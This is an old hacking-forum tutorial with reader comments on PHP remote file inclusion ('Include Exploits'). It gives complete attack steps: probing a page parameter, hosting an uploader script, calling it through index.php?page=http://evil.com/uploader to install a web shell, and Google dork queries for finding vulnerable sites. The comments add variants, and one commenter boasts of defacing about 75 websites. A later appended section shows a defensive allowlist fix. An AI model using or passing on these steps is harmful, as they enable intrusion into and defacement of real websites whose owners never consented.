Include Exploits
In this article I will teach you the basics of Include Exploits. If you understand PHP then this will help, although not much.
When a site uses one page to call all the others around a basic template, it can become subject to exploitation under certain circumstances.
e.g. http://www.abc.com/index.php?page=news
To test if it's vulnerable, try changing it to abc or whatever.
e.g. http://www.abc.com/index.php?page=abc
If it's vulnerable you should get an error like this:
Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01
Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.
e.g. $page = $_GET ['page'] . ".php"; include ($page);
So, what we need now is an uploader to allow us to upload files onto their server. Here's some dazzling code written by cheesy himself:
<?php
if ( $userfile ) {
    @$res=copy($userfile,"$userfile_name");
    if ( !$res ){ print "Upload failed! \n"; }else{ print "Upload of $userfile_name successful \n"; }
}
?>
<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>
So, we need to host this code on a server that doesn't support PHP, or just edit your htaccess so your server treats it as HTML or whatever. A good, simple free host that doesn't support PHP and is quick, easy and anonymous is cjb.net
So to exploit the page simply add your url for the uploader script:
e.g. http://www.abc.com/index.php?page=http://evil.com/uploader
Remember, if the site adds .php to the page variable, be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.
To find vulnerable sites, we can use our best friend, Google. Good searches include:
inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"
Be imaginative :)
Thanks for reading and I hope you've learnt something new.
Will.
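For the defender's side of the pattern above (a request value concatenated into include), one way to route pages is a fixed allowlist. This is an added example, not the article author's code; the page names, the pages directory and resolve_page() are assumptions for illustration.

```php
<?php
// Added example (not from the original article): allowlist-based page routing.
// The page names and the demo directory are assumptions for illustration.

const PAGES = [            // request value => file under the pages directory
    'news'      => 'news.php',
    'downloads' => 'downloads.php',
];

/**
 * Map the untrusted ?page= value to a file path, or return null.
 * The request value is only ever used as an array key, never as part of a path.
 */
function resolve_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: build a throwaway pages directory so this runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
@mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "<?php echo 'ok';");
}

// Constructed inputs: one valid page, the two values from the article,
// a traversal string and a non-string value.
$inputs = ['news', 'abc', 'http://evil.com/uploader', '../index', ['x']];
foreach ($inputs as $in) {
    $path  = resolve_page($in, $dir);
    $label = json_encode($in, JSON_UNESCAPED_SLASHES);
    printf("%-30s => %s\n", $label, $path === null ? '404 (rejected)' : basename($path));
}
```

In a front controller the returned path would be passed to include, with a 404 response for null. Keeping allow_url_include and display_errors off in php.ini also stops PHP from fetching a URL in include and from printing the path-revealing warning shown earlier.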
ghost 18 years ago
That's because the index.php file you're exploiting doesn't have the permissions, I think. Try making a script using fopen instead.
ghost 18 years ago
What article did you base this off of? I'm not accusing you of anything, just wondering if you had read the article I posted to Rohitab and HTS a while back.
ghost 18 years ago
thousandtoone, I based it on sheer experience. I haven't read your article and apologise if you feel I've copied you. I've never even heard of 'Rohitab' and have only ever been on HTS once. Was your article similar to mine?
ghost 18 years ago
WilleH, figured that was the case. Generally people don't try to reinvent the wheel so I thought you might've read this somewhere in the past. This article I wrote was one of my first major attempts at defacing.. Between this and finding two of my own vulnerabilities in PHP-Nuke, I must've defaced close to 75 websites in one weekend.
http://www.hackthissite.org/articles/read/285/2/30
ghost 18 years ago
You talk more about uploads whereas I discuss shell commands and general fopen attacks, but nonetheless you can see where I imagined you might've seen my article. Fun stuff and good article!
ghost 18 years ago
there is one problem… most websites use it like this:
<?php $page=$_GET['page']; $page_include="include/".$page; include($page_include); ?>
basically, this means that if you use this exploit it will include include/http://evil.com/uploader.php instead of http://evil.com/uploader.php, so the file won't be found :(
ghost 18 years ago
Well, I found one. It's not to break down your article, it's very good. Just said not many sites used it like that…
ghost 18 years ago
And, I'm not going to give you an example because no doubt it would get around and the server would get raped.
ghost 17 years ago
SkareCrow wrote a similar article, for those who still don't get it:
http://www.hellboundhackers.org/articlecomments.php?article_id=612